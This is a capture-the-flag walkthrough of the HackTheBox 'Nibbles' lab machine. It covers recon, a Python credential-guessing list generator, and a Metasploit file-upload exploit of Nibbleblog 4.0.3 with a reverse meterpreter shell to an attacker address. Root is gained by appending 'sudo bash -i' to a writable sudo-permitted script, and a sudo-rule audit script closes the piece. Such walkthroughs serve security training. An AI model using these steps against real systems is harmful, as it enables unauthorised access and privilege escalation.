![[Nibbles.png]]

# **Nmap Results**

```bash
# Set the target variables for this engagement and persist them for new shells
echo -e "\ntarget_ip=10.129.13.53\ntarget_domain=nibbles.htb" | tee -a ~/.bashrc
exec bash
echo "$target_ip $target_domain" | sudo tee -a /etc/hosts
mkdir -p $target_domain/nmap && cd $target_domain

# Scan all TCP ports
sudo nmap -sC -sV -oA nmap/full.tcp -p- $target_ip -vv

# Scan top 1000 UDP ports
sudo nmap -sU -oA nmap/initial.udp $target_ip -vv

# Scan top 100 UDP ports using a faster timing template
# (separate output basename so it does not overwrite the previous UDP scan)
sudo nmap -sU -oA nmap/fast.udp -T4 -F $target_ip -vv
```

```text
Nmap scan report for nibbles.htb (10.129.13.53)
Host is up, received echo-reply ttl 63 (0.064s latency).
Scanned at 2025-11-09 20:06:54 UTC for 51997s
Not shown: 65515 closed tcp ports (reset)
PORT      STATE    SERVICE        REASON         VERSION
22/tcp    open     ssh            syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD8ArTOHWzqhwcyAZWc2CmxfLmVVTwfLZf0zhCBREGCpS2WC3NhAKQ2zefCHCU8XTC8hY9ta5ocU+p7S52OGHlaG7HuA5Xlnihl1INNsMX7gpNcfQEYnyby+hjHWPLo4++fAyO/lB8NammyA13MzvJy8pxvB9gmCJhVPaFzG5yX6Ly8OIsvVDk+qVa5eLCIua1E7WGACUlmkEGljDvzOaBdogMQZ8TGBTqNZbShnFH1WsUxBtJNRtYfeeGjztKTQqqj4WD5atU8dqV/iwmTylpE7wdHZ+38ckuYL9dmUPLh4Li2ZgdY6XniVOBGthY5a2uJ2OFp2xe1WS9KvbYjJ/tH
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPiFJd2F35NPKIQxKMHrgPzVzoNHOJtTtM+zlwVfxzvcXPFFuQrOL7X6Mi9YQF9QRVJpwtmV9KAtWltmk3qm4oc=
|   256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC/RjKhT/2YPlCgFQLx+gOXhC6W3A3raTzjlXQMT8Msk
80/tcp    open     http           syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
3572/tcp  filtered megaregsvrport no-response
6395/tcp  filtered unknown        no-response
7185/tcp  filtered unknown        no-response
17777/tcp filtered sw-orion       no-response
20179/tcp filtered unknown        no-response
21161/tcp filtered unknown        no-response
26078/tcp filtered unknown        no-response
31780/tcp filtered unknown        no-response
35862/tcp filtered unknown        no-response
41391/tcp filtered unknown        no-response
42250/tcp filtered unknown        no-response
42829/tcp filtered unknown        no-response
44243/tcp filtered unknown        no-response
49212/tcp filtered unknown        no-response
56885/tcp filtered unknown        no-response
58658/tcp filtered unknown        no-response
61219/tcp filtered unknown        no-response
65330/tcp filtered unknown        no-response
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Nov 10 10:33:31 2025 -- 1 IP address (1 host up) scanned in 51997.72 seconds
```

Only SSH (OpenSSH 7.2p2, which dates the host to Ubuntu 16.04) and HTTP (Apache 2.4.18) are open. The scattered `filtered` ports returned no response at all and are most likely scan noise rather than services; the web server is the only realistic way in.

# **Service Enumeration**

## **TCP/80**

### **Directory Brute Force**

An initial directory brute force of the web root turned up nothing beyond the default `index.html` and the usual Apache 403s for `.ht*` files and `server-status`.
```bash
gobuster dir -u http://$target_domain -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
```

```
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://nibbles.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 290]
/.htaccess            (Status: 403) [Size: 295]
/.htpasswd            (Status: 403) [Size: 295]
/index.html           (Status: 200) [Size: 93]
/server-status        (Status: 403) [Size: 299]
Progress: 4746 / 4746 (100.00%)
===============================================================
Finished
===============================================================
```

The 93-byte `index.html` is worth reading rather than just noting: its source contains an HTML comment pointing at a non-standard directory, which no wordlist would have found.

```bash
curl http://$target_domain
```

```
<b>Hello world!</b>

<!-- /nibbleblog/ directory. Nothing interesting here! -->
```

A directory brute force of `/nibbleblog` revealed the layout of a blog application: an admin login, a `README`, and a `content` directory that would have to be examined in turn.
```bash
gobuster dir -u http://$target_domain/nibbleblog -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
```

```
===============================================================
Gobuster v3.8
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://nibbles.htb/nibbleblog
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.8
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd            (Status: 403) [Size: 306]
/.htaccess            (Status: 403) [Size: 306]
/.hta                 (Status: 403) [Size: 301]
/README               (Status: 200) [Size: 4628]
/admin                (Status: 301) [Size: 321] [--> http://nibbles.htb/nibbleblog/admin/]
/admin.php            (Status: 200) [Size: 1401]
/content              (Status: 301) [Size: 323] [--> http://nibbles.htb/nibbleblog/content/]
/index.php            (Status: 200) [Size: 2987]
/languages            (Status: 301) [Size: 325] [--> http://nibbles.htb/nibbleblog/languages/]
/plugins              (Status: 301) [Size: 323] [--> http://nibbles.htb/nibbleblog/plugins/]
/themes               (Status: 301) [Size: 322] [--> http://nibbles.htb/nibbleblog/themes/]
Progress: 4746 / 4746 (100.00%)
===============================================================
Finished
===============================================================
```

### **Nibbleblog**

Among the results was an administrative login page at `http://nibbles.htb/nibbleblog/admin.php`. I attempted to log in with common usernames and passwords, but that did not work.

![[Nibbles - Login Page.png]]

The software name and exact version were found in the `README`, which the application ships inside its web root.
```bash
curl http://nibbles.htb/nibbleblog/README
```

```
====== Nibbleblog ======
Version: v4.0.3
Codename: Coffee
Release date: 2014-04-01

Site: http://www.nibbleblog.com
Blog: http://blog.nibbleblog.com
Help & Support: http://forum.nibbleblog.com
Documentation: http://docs.nibbleblog.com
```

# **Exploit**

## **Nibbleblog File Upload Vulnerability**

Based on the software version, I identified a vulnerability that allows an authenticated user to upload arbitrary files: Nibbleblog 4.0.3 is affected by CVE-2015-6967, in which the bundled My Image plugin accepts an uploaded "image" without checking its type, so an administrator can upload a PHP file and then execute it from the web root.

```bash
searchsploit nibbleblog
```

## **Finding Valid Credentials**

All that was needed was a valid set of credentials. Based on the directory brute force results, I began manual enumeration. The `/content/private` directory, which is the application's data store and should not be reachable over HTTP at all, is served with a directory listing. Inside it, `users.xml` gave a valid username, `admin`.

```bash
curl http://nibbles.htb/nibbleblog/content/private/users.xml | xmllint --format -
```

```
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<users>
  <user username="admin">
    <id type="integer">0</id>
    <session_fail_count type="integer">0</session_fail_count>
    <session_date type="integer">1514544131</session_date>
  </user>
  <blacklist type="string" ip="10.10.10.1">
    <date type="integer">1512964659</date>
    <fail_count type="integer">1</fail_count>
  </blacklist>
</users>
```

The same file also shows how Nibbleblog handles failed logins: it records a per-IP `fail_count` and blacklists an address after repeated failures, so a blind brute force against `admin.php` is both noisy and likely to lock the attacker's own IP out. A short, target-specific guess list is the better approach. Reviewing the other files in the directory, `config.xml` among them, I found the term `nibbles` used repeatedly (the site name, the SEO title, the hostname). Sure enough, I was able to log in with the credentials `admin:nibbles`.
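The guess list above was built by eye. The following is an added example, not part of the original write-up, that does the same thing mechanically: it parses the exposed `users.xml` and `config.xml`, lists the accounts and the IPs the application has already throttled, and tokenizes every string-typed configuration value (plus the hostname) into a ranked candidate-password list. The embedded XML is a trimmed copy of the files retrieved above, and the variant rules (lower, capitalized, upper) are this example's own heuristic, not anything Nibbleblog does.

```python
"""Turn Nibbleblog's exposed content/private/*.xml files into a
target-specific credential list (added example, not from the original post)."""
from __future__ import annotations

import re
import xml.etree.ElementTree as ET

# Constructed inputs: trimmed copies of the users.xml and config.xml served
# from http://nibbles.htb/nibbleblog/content/private/ in the write-up above.
USERS_XML = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<users>
  <user username="admin">
    <id type="integer">0</id>
    <session_fail_count type="integer">0</session_fail_count>
    <session_date type="integer">1514544131</session_date>
  </user>
  <blacklist type="string" ip="10.10.10.1">
    <date type="integer">1512964659</date>
    <fail_count type="integer">1</fail_count>
  </blacklist>
</users>"""

CONFIG_XML = """<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<config>
  <name type="string">Nibbles</name>
  <slogan type="string">Yum yum</slogan>
  <footer type="string">Powered by Nibbleblog</footer>
  <url type="string">http://10.10.10.134/nibbleblog/</url>
  <seo_site_title type="string">Nibbles - Yum yum</seo_site_title>
  <seo_site_description type="string"/>
  <theme type="string">simpler</theme>
</config>"""

# Tokens that carry no target-specific information.
STOPWORDS = {"http", "https", "www", "the", "and", "for"}


def usernames(users_xml: str) -> list[str]:
    """Account names defined in users.xml, in file order."""
    root = ET.fromstring(users_xml)
    return [u.get("username") for u in root.findall("user") if u.get("username")]


def blacklisted(users_xml: str) -> dict[str, int]:
    """IPs the application has recorded failed logins for, with their counts.
    Check this before spraying: Nibbleblog throttles by source address."""
    root = ET.fromstring(users_xml)
    return {b.get("ip"): int(b.findtext("fail_count", "0"))
            for b in root.findall("blacklist")}


def password_candidates(config_xml: str, hostname: str = "") -> list[str]:
    """Rank words found in string-typed config values (and the hostname) by
    frequency and emit lower/Capitalized/UPPER variants, de-duplicated."""
    root = ET.fromstring(config_xml)
    counts: dict[str, int] = {}
    texts = [(e.text or "") for e in root if e.get("type") == "string"]
    texts.append(hostname)
    for text in texts:
        for word in re.findall(r"[A-Za-z]{3,}", text):
            w = word.lower()
            if w not in STOPWORDS:
                counts[w] = counts.get(w, 0) + 1
    ranked = sorted(counts, key=lambda w: (-counts[w], w))
    out: list[str] = []
    for w in ranked:
        for cand in (w, w.capitalize(), w.upper()):
            if cand not in out:
                out.append(cand)
    return out


def credential_pairs(users_xml: str, config_xml: str, hostname: str = "") -> list[tuple[str, str]]:
    """Every (username, candidate) pair to try against admin.php, in order."""
    cands = password_candidates(config_xml, hostname)
    return [(u, p) for u in usernames(users_xml) for p in cands]


if __name__ == "__main__":
    print("users:", usernames(USERS_XML))
    print("throttled IPs:", blacklisted(USERS_XML))
    for user, pw in credential_pairs(USERS_XML, CONFIG_XML, "nibbles.htb")[:6]:
        print(f"{user}:{pw}")
```

Against the files from this host the ranking puts `yum` first (it appears four times across the slogan and SEO title) and `nibbles` second, so the working password is reached on the fourth attempt, well under any lockout threshold.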
```bash
curl http://nibbles.htb/nibbleblog/content/private/config.xml | xmllint --format -
```

```
<?xml version="1.0" encoding="utf-8" standalone="yes"?>
<config>
  <name type="string">Nibbles</name>
  <slogan type="string">Yum yum</slogan>
  <footer type="string">Powered by Nibbleblog</footer>
  <advanced_post_options type="integer">0</advanced_post_options>
  <url type="string">http://10.10.10.134/nibbleblog/</url>
  <path type="string">/nibbleblog/</path>
  <items_rss type="integer">4</items_rss>
  <items_page type="integer">6</items_page>
  <language type="string">en_US</language>
  <timezone type="string">UTC</timezone>
  <timestamp_format type="string">%d %B, %Y</timestamp_format>
  <locale type="string">en_US</locale>
  <img_resize type="integer">1</img_resize>
  <img_resize_width type="integer">1000</img_resize_width>
  <img_resize_height type="integer">600</img_resize_height>
  <img_resize_quality type="integer">100</img_resize_quality>
  <img_resize_option type="string">auto</img_resize_option>
  <img_thumbnail type="integer">1</img_thumbnail>
  <img_thumbnail_width type="integer">190</img_thumbnail_width>
  <img_thumbnail_height type="integer">190</img_thumbnail_height>
  <img_thumbnail_quality type="integer">100</img_thumbnail_quality>
  <img_thumbnail_option type="string">landscape</img_thumbnail_option>
  <theme type="string">simpler</theme>
  <notification_comments type="integer">1</notification_comments>
  <notification_session_fail type="integer">0</notification_session_fail>
  <notification_session_start type="integer">0</notification_session_start>
  <notification_email_to type="string">[email protected]</notification_email_to>
  <notification_email_from type="string">[email protected]</notification_email_from>
  <seo_site_title type="string">Nibbles - Yum yum</seo_site_title>
  <seo_site_description type="string"/>
  <seo_keywords type="string"/>
  <seo_robots type="string"/>
  <seo_google_code type="string"/>
  <seo_bing_code type="string"/>
  <seo_author type="string"/>
  <friendly_urls type="integer">0</friendly_urls>
  <default_homepage type="integer">0</default_homepage>
</config>
```

![[Nibbles - Dashboard.png]]

## **Exploiting the Vulnerability**

With the help of `msfconsole`, I was able to exploit the target with ease. The module authenticates to `admin.php` with the recovered credentials, uploads a PHP payload through the My Image plugin's image form, and then requests the uploaded file from `content/private/plugins/my_image/` to trigger the reverse connection. The resulting session runs as `nibbler`, the account Apache runs under on this host.

```
msf exploit(multi/http/nibbleblog_file_upload) > options

Module options (exploit/multi/http/nibbleblog_file_upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   nibbles          yes       The password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: sapni, socks4, socks5, socks5h, http
   RHOSTS     10.129.13.53     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /nibbleblog      yes       The base path to the web application
   USERNAME   admin            yes       The username to authenticate with
   VHOST                       no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.61      yes       The listen address (an interface may be specified)
   LPORT  45753            yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Nibbleblog 4.0.3
```

# **Privilege Escalation**

## **Abusing `sudo` and Weak File Permissions**

One of the first checks performed was to determine what the current user can run with `sudo`.

```bash
sudo -l
```

```
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
```

The rule lets `nibbler` run a script as root without a password, and the script lives under `nibbler`'s own home directory. I attempted to `ls` the file `/home/nibbler/personal/stuff/monitor.sh`, but it did not exist on disk, which is no obstacle: anyone who can create a file at that path gets root.
```bash
ls -latr /home/nibbler/personal/stuff/monitor.sh
```

```
ls: cannot access '/home/nibbler/personal/stuff/monitor.sh': No such file or directory
```

Looking in the user's home directory, I found a ZIP file of interest. Extracting it from within `/home/nibbler` recreates exactly the path the `sudo` rule expects.

```bash
ls -latr /home/nibbler
```

```
total 28
drwxr-xr-x 3 root    root    4096 Dec 10  2017 ..
drwxrwxr-x 2 nibbler nibbler 4096 Dec 10  2017 .nano
-r-------- 1 nibbler nibbler 1855 Dec 10  2017 personal.zip
-rw------- 1 nibbler nibbler    0 Dec 29  2017 .bash_history
-r-------- 1 nibbler nibbler   33 Nov  9 15:05 user.txt
drwxr-x--- 3 nibbler nibbler 4096 Nov  9 16:50 .config
drwxr-xr-x 5 nibbler nibbler 4096 Nov  9 16:51 .
drwx------ 2 nibbler nibbler 4096 Nov  9 16:51 .gnupg
```

```bash
# The archive stores relative paths, so extract from the home directory
cd /home/nibbler && unzip /home/nibbler/personal.zip
```

```
Archive:  /home/nibbler/personal.zip
   creating: personal/
   creating: personal/stuff/
  inflating: personal/stuff/monitor.sh
```

The extracted script carries the permissions stored in the archive, and they are as loose as they get: world-writable and owned by the current user.

```bash
ls -latr /home/nibbler/personal/stuff/monitor.sh
```

```
-rwxrwxrwx 1 nibbler nibbler 4015 May  8  2015 /home/nibbler/personal/stuff/monitor.sh
```

After making a backup of the file, I appended a single line and ran it with `sudo`. The appended command executes at the end of the script with root privileges, and just like that I had a root shell.

```bash
cp /home/nibbler/personal/stuff/monitor.sh /home/nibbler/personal/stuff/monitor.sh.bak
# The script already runs as root here, so a plain 'bash -i' would do as well
echo 'sudo bash -i' >> /home/nibbler/personal/stuff/monitor.sh
sudo /home/nibbler/personal/stuff/monitor.sh
```

The root cause is not the script itself but the `sudoers` entry: `sudo` checks only that the invoked path matches the rule, not who owns the file or whether it existed when the rule was written. Any `NOPASSWD` rule whose target is writable by the invoking user, or sits under a directory that user controls, is equivalent to `ALL`.

# **References**

- [Nibbleblog File Upload Vulnerability](https://www.rapid7.com/db/modules/exploit/multi/http/nibbleblog_file_upload/)
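The `sudo -l` finding above is an instance of a general check: for each command a rule permits, ask whether the invoking user can write the file, replace it, or create it because it does not exist yet. The following is an added example, not part of the original write-up, that parses `sudo -l` output and classifies every rule target that way. The fixture it builds is constructed to mirror this box (a home directory the user owns, a rule pointing at a not-yet-existing script under it, and a world-writable script); the status names are this example's own. Note that `os.access` reports everything writable when run as root, so run it as the low-privilege user.

```python
"""Classify `sudo -l` rule targets by how much control the invoking user
has over them (added example, not from the original post)."""
from __future__ import annotations

import os
import re
import tempfile

# Matches rule lines such as "(root) NOPASSWD: /path/a, /path/b arg" or "(ALL : ALL) ALL".
RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s+(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+?)\s*$"
)


def parse_sudo_rules(text: str) -> list[tuple[str, str, str]]:
    """Return (runas, tags, command_path) for each command spec in `sudo -l`
    output. Only the first token of a spec is the executable; arguments are
    dropped. Lines that are not rule lines (Defaults, headers) are skipped."""
    rules: list[tuple[str, str, str]] = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = m.group("tags").replace(" ", "").rstrip(":")
        for spec in m.group("cmds").split(","):
            spec = spec.strip()
            if spec:
                rules.append((m.group("runas"), tags, spec.split()[0]))
    return rules


def first_existing_ancestor(path: str) -> str:
    """Walk up from a missing path to the nearest directory that exists."""
    p = os.path.abspath(path)
    while not os.path.exists(p):
        parent = os.path.dirname(p)
        if parent == p:
            break
        p = parent
    return p


def classify(path: str) -> str:
    """unrestricted  : rule allows ALL
    writable         : target exists and the user can modify it
    replaceable      : target is read-only but its directory is writable
    missing-creatable: target does not exist and the user can create it
    missing          : target does not exist and cannot be created
    ok               : none of the above"""
    if path == "ALL":
        return "unrestricted"
    if not os.path.exists(path):
        anc = first_existing_ancestor(path)
        return "missing-creatable" if os.access(anc, os.W_OK) else "missing"
    if os.access(path, os.W_OK):
        return "writable"
    if os.access(os.path.dirname(os.path.abspath(path)), os.W_OK):
        return "replaceable"
    return "ok"


def audit_sudo_rules(text: str) -> dict[str, str]:
    """Map every rule target in `sudo -l` output to its classification."""
    return {path: classify(path) for _, _, path in parse_sudo_rules(text)}


def build_demo() -> tuple[str, str, str]:
    """Constructed fixture mirroring the box. Returns
    (sudo_l_text, missing_script_path, writable_script_path)."""
    home = tempfile.mkdtemp(prefix="nibbler-")  # owned and writable by us
    missing = os.path.join(home, "personal", "stuff", "monitor.sh")
    writable = os.path.join(home, "backup.sh")
    with open(writable, "w") as fh:
        fh.write("#!/bin/bash\necho backup\n")
    os.chmod(writable, 0o777)  # same mode the extracted monitor.sh had
    text = (
        "Matching Defaults entries for nibbler on Nibbles:\n"
        "    env_reset, mail_badpass, secure_path=/usr/local/sbin\\:/usr/local/bin\n"
        "\n"
        "User nibbler may run the following commands on Nibbles:\n"
        f"    (root) NOPASSWD: {missing}, {writable}\n"
        "    (ALL : ALL) ALL\n"
    )
    return text, missing, writable


if __name__ == "__main__":
    demo_text, _, _ = build_demo()
    for target, status in audit_sudo_rules(demo_text).items():
        print(f"{status:18} {target}")
```

On a live host, feed it the real output with `audit_sudo_rules(subprocess.run(["sudo", "-l"], capture_output=True, text=True).stdout)`; anything reported as `writable`, `replaceable`, `missing-creatable` or `unrestricted` is a root shell waiting to happen.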